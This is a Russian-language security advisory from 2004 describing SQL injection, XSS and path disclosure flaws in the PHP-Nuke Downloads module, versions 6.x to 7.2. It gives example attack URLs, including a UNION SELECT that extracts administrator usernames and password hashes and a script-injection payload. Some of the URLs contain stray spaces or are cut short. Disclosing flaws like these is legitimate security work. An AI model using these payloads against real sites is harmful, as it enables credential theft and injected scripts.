SQL инъекция и XSS в PHP-NUKE

Дата публикации:
07.05.2004
Всего просмотров:
2252
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 6.x -7.2

Описание: Несколько уязвимостей обнаружено в PHP-NUKE. Удаленный пользователь может внедрить SQl команды и выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.

1. SQL инъекция в Downloads модуле в 'sid' переменной. Пример:

 
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdo wnload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_autho
2. 2. XSS в Downloads модуле в 'ttitle' переменной. Пример:
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
code here]
http://localhost/nuke72/modules.php?name =Downloads&d_op=ratedownload&lid=0&ttitle=<body
onload=document.title=1337>
3. Раскрытие инсталляционного пути:
http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

URL производителя:http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]

или введите имя

CAPTCHA